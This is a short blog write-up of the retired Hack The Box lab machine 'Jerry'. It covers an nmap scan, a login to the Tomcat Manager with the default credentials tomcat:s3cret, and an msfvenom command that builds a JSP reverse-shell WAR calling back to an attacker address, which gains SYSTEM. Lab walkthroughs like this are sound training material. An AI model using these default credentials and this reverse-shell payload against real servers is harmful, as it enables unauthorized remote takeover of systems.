Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Jerry

Imported · Chris Ruggieri

Name: Jerry
Release Date: 30 Jun 2018
Retire Date: 17 Nov 2019
OS: Windows
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
echthros 00 days, 03 hours, 06 mins, 18 seconds
echthros 00 days, 03 hours, 06 mins, 29 seconds
Creator: mrh4sh
CherryTree File: CherryTree - Remove the .txt extension
Security Blog, Rants, Raves, Write-ups, and Code

Jerry

Again, we start with nmap -sC -sV -oA -Pn ./jerry 10.10.10.95

 
$ nmap -sC -sV -Pn  -oA ./jerry 10.10.10.95
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-07 10:37 EDT
  Nmap scan report for 10.10.10.95
  Host is up (0.070s latency).
  Not shown: 999 filtered ports
  PORT     STATE SERVICE VERSION
  8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
  |_http-favicon: Apache Tomcat
  |_http-open-proxy: Proxy might be redirecting requests
  |_http-server-header: Apache-Coyote/1.1
  |_http-title: Apache Tomcat/7.0.88

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 31.08 seconds
 

There we go. We have a web page.  Granted it's a the default Tomcat page, but it's something.  Looking around, we find that the Manager App button takes us to http://10.10.10.95:8080/manager/html, but is asking for a password.  A quick Google search finds several possible default credentials.

Trying a few, we get in successfully with tomcat:s3cret.

In the Manager App, we see an Upload WAR section that can quickly deploy WAR files.  WAR files are basically zipped up JSP files.  MSFVenom can build a WAR reverse shell payload using:

  msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.27 LPORT=9999 -f war > shell.war

Upload that WAR file and deploy it.  Then visit the newly created /[filename] directory.  For me it was http://10.10.10.95:8080/shell.  A quick whoami shows that we are already NT AUTHORITY\SYSTEM.  Grab the flags at C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt

 

©2020 Phoenix Computing Solutions | Powered by Coffee, Sarcasm, and Insanity
  Everything included in the site is the intellectual property of Chris Ruggieri (Neocount Phoenix) and Phoenix Computing Solutions.
  This information should not be construed as legal advice. The owner can not be held liable for anything another entity does with this information.
  This information is solely the opinions and experiences of myself (Chris Ruggieri) and should not be construed as endorsement of any product, service, or of illegal activity

(GET WRITTEN PERMISSION PEOPLE!!)
  Any links I provide as a convenience and for informational purposes only; they do not constitute an endorsement or an approval by the owner of this site for any of the products, services or opinions of the corporation or organization or individual.
  Contact the external sites for answers to questions regarding its content.
  This Includes any links posted by Chris Ruggieri in any other websites, Social Media networks, Online Groups and Online sharing Websites.